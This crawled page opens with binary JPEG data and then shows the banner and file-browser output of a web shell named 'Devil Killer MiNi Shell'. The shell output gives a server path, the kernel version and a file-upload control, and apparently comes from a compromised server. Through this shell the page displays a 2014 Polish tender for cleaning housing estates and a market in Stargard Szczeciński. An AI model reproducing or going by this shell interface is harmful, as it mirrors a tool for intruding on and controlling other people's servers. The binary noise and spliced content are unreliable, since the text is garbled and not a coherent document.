JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140117/20438-N-2014.html

<p class="kh_header"><b>Stargard Szczeciński: Sprzątanie wewnątrz 50 budynków mieszkalnych  powierzchni 16 688  m2 ,utrzymanie w czystości przylegających budynków terenów zewnętrznych o powierzchni 45 491 m2  oraz utrzymanie w czystości innych terenów ogólnodostępnych o powierzchni 21 324,60 m2 przy obiektach administrowanych przez Stargardzkie  Towarzystwo Budownictwa Społecznego Spółka z o. o, na terenie Targowiska przy ul. Reja -Słowackiego o powierzchni 3543 m2 wraz z pawilonem socjalnym o powierzchni 40 m2 zgodnie z załączonym wykazem adresowym zał. 1,2,3</b><br>
<b>Numer ogłoszenia: 20438 - 2014; data zamieszczenia: 17.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Stargardzkie Towarzystwo Budownictwa Społecznego Sp.z o.o. , ul. A. Struga 29, 73-110 Stargard Szczeciński, woj. zachodniopomorskie, tel. 091 5784750, faks 091 577 15 35.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tbs.stargard.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: podmiot prawa handlowego Spółkla ze 100 % udziałem Miasta-Gminy Stargard Szczeciński.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie wewnątrz 50 budynków mieszkalnych  powierzchni 16 688  m2 ,utrzymanie w czystości przylegających budynków terenów zewnętrznych o powierzchni 45 491 m2  oraz utrzymanie w czystości innych terenów ogólnodostępnych o powierzchni 21 324,60 m2 przy obiektach administrowanych przez Stargardzkie  Towarzystwo Budownictwa Społecznego Spółka z o. o, na terenie Targowiska przy ul. Reja -Słowackiego o powierzchni 3543 m2 wraz z pawilonem socjalnym o powierzchni 40 m2 zgodnie z załączonym wykazem adresowym zał. 1,2,3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Definicje i ogólne zasady związane z przedmiotem zamówienia:
Sprzątanie: usuwanie zanieczyszczeń , o których mowa w ustawie z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz.U z 2005 r nr 236 poz.2008 z późn. zm.) znajdujących się na terenach objętych przedmiotowym zamówieniem. Zanieczyszczeniami są w szczególności :  błoto, piasek, kamienie, muł, żwir, niedopałki papierosów, połamane gałęzie, liście, zwierzęce odchody ,wszelkiego rodzaju opakowania, papier, szkło, butelki, worki, folie, resztki pokarmów, oraz inne zanieczyszczenia wynikające z ruchu pieszego. Sprzątanie obejmuje również dezynfekcję opróżnionych pojemników na śmieci oraz wykonywanie innych czynności związanych z utrzymaniem czystości na terenach zewnętrznych Sprzątanie ponadto obejmuje w okresie zimowym  usuwanie śniegu , błota  i lodu z przejść, chodników, parkingów, dróg wewnętrznych, dojść do osłon śmietnikowych,   likwidację gołoledzi i śliskości pośniegowej, 
likwidacja   gołoledzi i śliskości pośniegowej  polega na  zastosowaniu środków stosownie do postanowień Ministra Środowiska z dnia 27 października 2005 r. w sprawie rodzajów i warunków stosowania środków , jakie mogą być używane na drogach publicznych, ulicach i placach (Dz. U. z 2005 r nr 230 poz. 1960). Likwidacja gołoledzi i śliskości pośniegowej powinna odbywać się stale w miarę potrzeby i w takich odstępach czasu aby oblodzona nawierzchnia nie była śliska.
Sprzątanie wykonuje się  w dni robocze ( za wyjątkiem ZADANIA NR 3), jeżeli liczba dni wolnych od pracy następujących po sobie wynosi więcej niż dwa, Wykonawca obowiązany jest posprzątać, zlecone  tereny wewnętrzne i zewnętrzne co najmniej w jednym dniu wolnym od pracy
Sprzątanie i mycie w  budynku ma się odbywać w czasie najmniej uciążliwym dla mieszkańców domu, a czynności codziennego sprzątania  powinny zostać zakończone do godz. 13°°.
Sprzątanie terenów zewnętrznych (za wyjątkiem ZADANIA NR 3)  latem Wykonawca powinien zakończyć do godz. 9.00,natomiast  zimowe   oczyszczanie ze śniegu, lodu i błota   nawierzchni chodników i dojść    do osłon śmietnikowych oraz zapobieganie śliskości Wykonawca obowiązany jest zakończyć do godz.  7°° rano. Nie dotyczy to ciągłych opadów  śniegu i marznącej mżawki powodującej gołoledź kiedy obowiązuje zasada stałej i bieżącej obsługi.
Wykonawca zapewnia  we własnym zakresie odpowiednie materiały (np. środki czystości, worki , środki dezynfekujące ) oraz narzędzia do wykonywania prac zgodnie z przedmiotem zamówienia.
Okres letni- to okres miedzy 01 kwietnia a 30 września  każdego roku
Okres zimowy - to okres między 01października a 31 marcem każdego roku.

Zadania i obowiązki Wykonawcy w zakresie utrzymania porządku i  czystości  wewnątrz  budynku  dotyczy ZADANIA NR  1 tabela nr 1  :
1.	Częstotliwość i zakres świadczonych usług:
a.	codziennie -sprzątanie pomieszczeń klatki schodowej, korytarzy
b.	dwa razy w miesiącu- sprzątanie schodów i korytarzy piwnicznych, oraz pomieszczeń wspólnego użytku tj. pralni, suszarni)
c.	raz w miesiącu- mycie wodą  ze środkami myjącymi np.: proszkiem, mydłem podestów, biegów, poręczy , klatek schodowych, sieni, korytarzy
d.	raz w kwartale- sprzątanie strychów, oraz oczyszczanie studzienki wodomierzowej w budynku i poza budynkiem
e.	dwa razy w roku - na wiosnę przed Świętami Wielkanocnymi i jesienią na przełomie  października i listopada mycie  środkami do tego przeznaczonymi okien i drzwi, lamperii na klatce schodowej,  mycie szyb, kloszy oświetlenia na klatce schodowej, korytarzach i pomieszczeniach wspólnego użytku 
2.	Do obowiązków Wykonawcy należy również:
a.	informowanie Zamawiającego na piśmie o zauważonych uszkodzeniach elementów klatki schodowej lub elewacji,  pomieszczeń i urządzeń wspólnego użytku i udzielenie pomocy w ewentualnym wykryciu sprawców,
b.	dekoracja flagami budynków z okazji świąt państwowych i lokalnych,
c.	rozwieszanie  w budynkach   zawiadomień   i   informacji   urzędowych lokalnych dotyczących mieszkańców domu,
d.	roznoszenie korespondencji dot. mieszkańców domu, aneksów, powiadomień o zmianie opłat,

Zadania i obowiązki Wykonawcy w zakresie utrzymania porządku i czystości wokół budynku i na zieleńcach przydomowych oraz na dojściach, chodnikach  dotyczy ZADANIA NR 1 tabela nr 1 i ZADANIA NR 2 tabela nr 4 :
1.	Częstotliwość i zakres świadczonych usług:
a.	Codziennie: sprzątanie podwórzy, parkingów, osłon  śmietnikowych, dojść do osłon śmietnikowych, dróg  wewnętrznych, chodników  i innych miejsc gromadzenia nieczystości, oraz w razie wystąpienia ciągłych opadów śniegu systematyczne jego usuwanie w   odstępach czasu gwarantujących w miarę swobodne korzystanie z chodników i przejść, a po ustaniu opadów  usunięcie śniegu  z parkingów, chodników, dróg wewnętrznych, dojść i spryzmowanie  przy krawędzi chodnika
b.	raz w tygodniu - w okresie od  01 listopada do 31 marca w dniach wywozu nieczystości stałych, dezynfekcja opróżnionych pojemników    na nieczystości i osłon śmietnikowych środkiem dezynfekującym np. Podchloryn Sodowy, Śmieciotox, Vigonez lub innymi podobnymi. Wykonawca zobowiązany jest kontrolować stan pojemników na nieczystości, informować Zamawiającego na bieżąco o  zauważonych brakach lub uszkodzeniach pojemników oraz o potrzebie ich wymiany lub uzupełnienia
2.	Odchwaszczanie chodników , opasek wokół budynków i terenów utwardzonych.
3.	Do obowiązków Wykonawcy należy dbałość o ład i porządek w osłonach śmietnikowych, przy pojemnikach na terenie i w ich otoczeniu. Wykonawca zobowiązany jest do usuwania zalegających nieczystości do pojemników. Wykonawca obowiązany jest informować Zamawiającego o zakłóceniach w wywozie nieczystości.
4.	Wykonawca jest zobowiązany do zgrabiania w miarę potrzeby opadłych  liści z obsługiwanych 
zieleńców. Po zgrabieniu liści  worki z odpadami należy umieścić przy altanach śmietnikowych 
oraz  niezwłocznie   powiadomić o tym fakcie Zamawiającego 
     
Zadania i obowiązki Wykonawcy w zakresie letniego i zimowego utrzymania porządku i czystości na terenach zewnętrznych ogólnodostępnych dotyczy ZADANIA NR 1 tabela nr 2 i ZADANIA NR 2 tabela nr 5 :
1.	Częstotliwość i zakres świadczonych usług:
Codzienne sprzątanie  chodników, parkingów, dojść ,zieleńców , a  w razie wystąpienia ciągłych opadów śniegu systematyczne jego usuwanie w   odstępach czasu gwarantujących w miarę swobodne korzystanie z chodników i przejść, a po ustaniu opadów  usunięcie śniegu  z parkingów, chodników, dróg wewnętrznych, dojść i spryzmowanie  przy krawędzi chodnika
2.	Do obowiązków Wykonawcy  w okresie zimowym należy również oczyszczanie ze śniegu i błota wpustów ulicznych, zasuw wodnych i hydrantów pożarowych w sposób zapewniający swobodny spływ wody w czasie odwilży oraz w celu łatwego zlokalizowania tych urządzeń na wypadek awarii lub pożaru.
3.	Wykonawca jest zobowiązany do zgrabiania w miarę potrzeby opadłych liści z obsługiwanych zieleńców. Po zgrabieniu liści worki z odpadami należy umieścić w miejscu wskazanym przez Zamawiającego i   niezwłocznie powiadomić o tym fakcie Zamawiającego 
4.	Wykonawca zobowiązany jest dbać o ład i porządek w miejscach składowania nieczystości, na 
terenie i w obrębie tych miejsc.

Zadania i obowiązki Wykonawcy w zakresie utrzymania porządku i  czystości  wewnątrz  budynku  dotyczy ZADANIA NR 2  tabela nr 3
1.	Szczegółowa częstotliwość sprzątania i mycia oraz powierzchnie wynikają z załączników do tabeli nr 3 o nr 3-1 do nr 3-13.
2.	Do obowiązków Wykonawcy należy również: 
a	informowanie Zamawiającego na piśmie o zauważonych uszkodzeniach elementów klatki schodowej lub elewacji pomieszczeń i urządzeń wspólnego użytku i pomocy w  wykryciu sprawców
b	dekoracja flagami budynków z okazji świąt państwowych i lokalnych
c	rozwieszanie w budynkach zawiadomień i informacji urzędowych lokalnych dotyczących mieszkańców domu
d	roznoszenie korespondencji dot. mieszkańców domów: aneksy -powiadomienia o zmianie opłat, roczne rozliczenie wody.

Zadania i obowiązki  w zakresie utrzymania porządku i czystości terenów zewnętrznych na zieleńcach przydomowych , dojściach, chodnikach obejmują w szczególności codzienne dotyczy ZADANIA NR 2 tabela nr 3:
1.	Szczegółowa częstotliwość sprzątania oraz powierzchnie wynikają z załączników do tabeli nr 3 o nr 3-1 do 3-13
2.	Do obowiązków Wykonawcy należy również:
a	zgrabianie w miarę potrzeby opadłych liści z obsługiwanych zieleńców. Po zgrabieniu liści worki z odpadami należy umieścić w miejscu wskazanym przez Zamawiającego i   niezwłocznie powiadomić o tym fakcie Zamawiającego 
b	systematyczne opróżnianie koszy na śmieci. Wykonawca zapewni worki do koszy na śmieci
c	w razie wystąpienia opadów ciągłych śnieg powinien być usuwany systematycznie w odstępach czasu gwarantujących w miarę swobodne korzystanie z chodników i przejść, a  po ustaniu opadów śniegu powinien być usunięty z powierzchni i spryzmowany przy krawędzi chodnika,
d	raz w tygodniu w okresie od 1 kwietnia do 31 października, raz w miesiącu  w okresie od 1 listopada do 31 marca w dniach wywozu  nieczystość   stałych - dezynfekcja opróżnionych pojemników na nieczystości osłon śmietnikowych  środkiem dezynfekującym np. Podchloryn Sodowy, Śmieciotox, Vigonez lub innymi podobnymi 
e	likwidacja chwastów oraz traw znajdujących się na utwardzonej powierzchni chodników , parkingach dojściach, przy krawężnikach oraz   opaskach budynków
f	ręczne odchwaszczanie terenów wokół  drzew krzewów wolnostojących oraz żywopłotów
g	podlewanie trawników, a w okresach suszy również drzew, krzew i innych nasadzeń z częstotliwością zapewniającą ich właściwe utrzymanie i w sposób zapobiegający ich schnięciu. Powyższe czynności należy wykonywać przy użyciu sprzętu dostarczonego przez Zamawiającego i z ujęć poboru wody wskazanych przez Zamawiającego 
h	zgłaszanie na bieżąco  o zauważonych brakach lub uszkodzeniach pojemników w poszczególnych posesjach oraz o potrzebie ich wymiany lub uzupełnienia.
i	dbałość o ład i porządek w osłonach śmietnikowych i w ich otoczeniu. Wykonawca zobowiązany jest do usuwania zalegających nieczystości do pojemników. Wykonawca obowiązany jest informować Zamawiającego o zakłóceniach w wywozie nieczystości.
Zadania i obowiązki  w zakresie utrzymania porządku i czystości terenów zewnętrznych i wewnątrz budynku obejmują w szczególności  dotyczy ZADANIA NR 2 patio
1.	Częstotliwość i zakres świadczonych usług:
a	Codzienne sprzątanie: powierzchni utwardzonej, nawierzchni na placu zabaw, zieleńców , żywopłotów, windy, punktu widokowego, schodów (przejścia z górnego patio do dolnego , przejść do poszczególnych poziomów garażowych, przejścia z poziomu garażowego do patio dolnego) , opróżnianie koszy na śmieci. W razie wystąpienia opadów ciągłych śniegu powinien być usuwany systematycznie w odstępach czasu gwarantujących w miarę swobodne korzystanie z przejść, a  po ustaniu opadów śniegu powinien być usunięty z powierzchni i spryzmowany
b	raz w tygodniu mycie windy, punktu widokowego ( za wyjątkiem okresu zimowego), schodów (przejścia z górnego patio do dolnego , przejść do poszczególnych poziomów garażowych, przejścia z poziomu garażowego do patio dolnego) ,
c	Dwa razy w sezonie , na wiosnę oraz jesień zagrabianie trawników na dolnym patio,
d	Systematyczne ręczne odchwaszczanie zieleńców, rabat obsadzonych roślinnością ozdobną , żywopłotów,
e	Systematyczna likwidacja chwastów oraz traw znajdujących się na utwardzonej powierzchni, chodników oraz na placu zabaw.
f	Systematyczne  oczyszczanie rabat i żywopłotów z opadłych liści.

Zadania i obowiązki Wykonawcy w zakresie utrzymania porządku i czystości na terenie Targowiska przy ul. Reja -Słowackiego o powierzchni 3 543 m2 dotyczy ZADANIA NR 3:
1.	Sprzątanie  w okresie letnim należy wykonać przed rozpoczęciem handlu od godz.5.00 oraz  po zakończeniu handlu po godz. 18.00, w okresie zimowym,  przed rozpoczęciem handlu od godz.6.00 oraz po zakończeniu handlu po godz. 16. Sprzątanie wykonuje się codziennie łącznie z sobotami i niedzielami
2.	Częstotliwość i zakres świadczonych usług na terenie targowiska :
Codzienne:
sprzątanie terenu całego targowiska,  części chodnika wzdłuż placu targowego od strony ul. Słowackiego. Zanieczyszczenia należy umieszczać w ustawionych na terenie targowiska pojemnikach, a w okresie od piątku do niedzieli z powodu zwiększonego natężenia handlu, również w dodatkowo ustawionych , zamkniętych wózkach. Wykonawca zobowiązany jest do wystawienia dodatkowych wózków w każdy piątek , a po ich opróżnieniu w poniedziałek do ich schowania do wyznaczonego, zamkniętego pomieszczenia. W razie wystąpienia ciągłych opadów śniegu systematyczne jego usuwanie w   odstępach czasu gwarantujących w miarę swobodne korzystanie z chodników i przejść, a po ustaniu opadów  usunięcie śniegu  z chodnika, dróg wewnętrznych, dojść i spryzmowanie  przy krawędzi chodnika.
 mycie stołów , straganów.
3.	Częstotliwość i zakres świadczonych usług w pawilonie socjalnym o pow. 40 m2 
a.	Codzienne:
	mycie podłóg, czyszczenie i odkurzanie  powierzchni mebli i wyposażenia w pomieszczeniu biurowym
	mycie podłóg, glazury, drzwi, ścian, luster, urządzeń i armatury sanitarnej oraz opróżnianie koszy w dwóch pomieszczeniach w-c 
	sprzątanie pomieszczenia socjalnego i pomieszczenia na pojemniki w pawilonie socjalnym.
b	Dwa razy w roku tj przed Świętami Bożego Narodzenia i Wielkanocnymi  mycie okien w pawilonie socjalnym,
4.	Przeprowadzanie dezynfekcji opróżnionych pojemników na nieczystości przy pomocy środków dezynfekcyjnych w miarę potrzeby w dniach wywozu nieczystości.
..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje udzielenie zamówień uzupełniających obejmujących  15% zamówienia podstawowego , przedmiotem zamówienia uzupełniającego jest powtórzenie tego samego rodzaju zamówienia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 90.60.00.00-3, 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.03.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości9400 zł na zadanie nr 1, 13000zł na zadanie nr 2 i 1900 zł na zadanie nr 3 w jednej lub kilku następujących formach; gwarancjach bankowych lub ubezpieczeniowych,poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej,poręczeniach udzielanych przez podmioty , o których mowa w art.45 ust.6 pkt 5 pzp lub w pieniądzu.wadium w formie pieniężnej winno wpłynąć przed terminem składania ofert na rachunek zamawiającego w Banku PEKAO SA o Stargard Szczeciński nr 10124039011111000042204466 i opisywać odpowiednio wadium przetarg sprzątanie wewnątrz budynków mieszkalnych i utrzymanie w czystości przylegających do nich terenów zewnętrznych Zadanie nr .... wpisać odpowiednie zadanie</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie opisuje sposobu oceniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, ze Wykonawca spełnia warunek wiedzy i doświadczenia, jeżeli wykaże , że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy-  w tym okresie , wykonał lub wykonuje co najmniej jedną usługę trwającą minimum 12 miesięcy  odpowiadającą swoim rodzajem i wielkością  usługom stanowiącym przedmiot zamówienia, Zamawiający rozumie przez to sprzątanie wewnątrz budynków mieszkalnych, przylegających do nich terenów zewnętrznych oraz terenów ogólnodostępnych  o łącznej powierzchni  usług wykonywanych  w ciągu każdego miesiąca co najmniej o 
a.łącznej  powierzchni sprzątanej budynków  7 000m2  i terenów zewnętrznych 30 000 m2  w odniesieniu do ZADANIA NR 1,
b.łącznej  powierzchni sprzątanej budynków 8 000 m2  i terenów zewnętrznych 40 000 m2  w odniesieniu do ZADANIA NR 2
c.łącznej  powierzchni sprzątanej co najmniej 3 500,00 m2  w odniesieniu do ZADANIA NR 3,
z podaniem dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że  te usługi zostały wykonane lub są wykonywane należycie 
W przypadku , gdy Wykonawca składa ofertę na więcej niż jedno zadanie musi wykazać, ze spełnia powyższy warunek na sumę postawionych kryteriów wynikających z zadań nr 1, nr 2 i nr 3, np. jeżeli Wykonawca składa ofertę na zadanie nr i zadanie nr 2 musi wykazać, ze posiada doświadczenie w sprzątaniu budynków o łącznej powierzchni 15 000 m 2 i terenów zewnętrznych o powierzchni 70 000 m2 . 
Dowodami potwierdzającymi, ze usługi zostały wykonane lub są wykonywane należycie są:
1.poświadczenie ,  z tym, ze w odniesieniu do nadal wykonywanych usług poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
2.oświadczenie wykonawcy- jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia.
3.W przypadku, gdy usługi , wskazane  w wykazie usług zostały wykonane na rzecz  Stargardzkiego TBS Sp.  z o.o. , wykonawca nie ma obowiązku przedkładania dowodów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie opisuje sposobu oceniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania osób zdolnych do wykonania zamówienia , jeżeli Wykonawca wykaże się średniomiesięcznym zatrudnieniem na poziomie co najmniej 8 osób w odniesieniu do ZADANIA NR 1 , w odniesieniu do ZADANIA NR 2 co najmniej 8 , 3 osób w odniesieniu do ZADANIA NR 3 w okresie ostatnich trzech lat, a  w przypadku gdy okres prowadzenia działalności jest krótszy  w tym okresie, W przypadku gdy Wykonawca składa ofertę na więcej niż jedno zadanie musi wykazać się , ze spełnia powyższy warunek na sumę postawionych kryteriów wynikających z zadań  nr 1, nr 2 i nr 3., np. jeżeli Wykonawca składa ofertę na zadanie nr 1 i nr 2 musi wykazać się średnio miesięcznym zatrudnieniem na poziomie co najmniej 16 osób .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę co najmniej 100 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>zamawiający nie wymaga wskazania przez wykonawcę usług wykonanych lub wykonywanych nienależycie.;</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
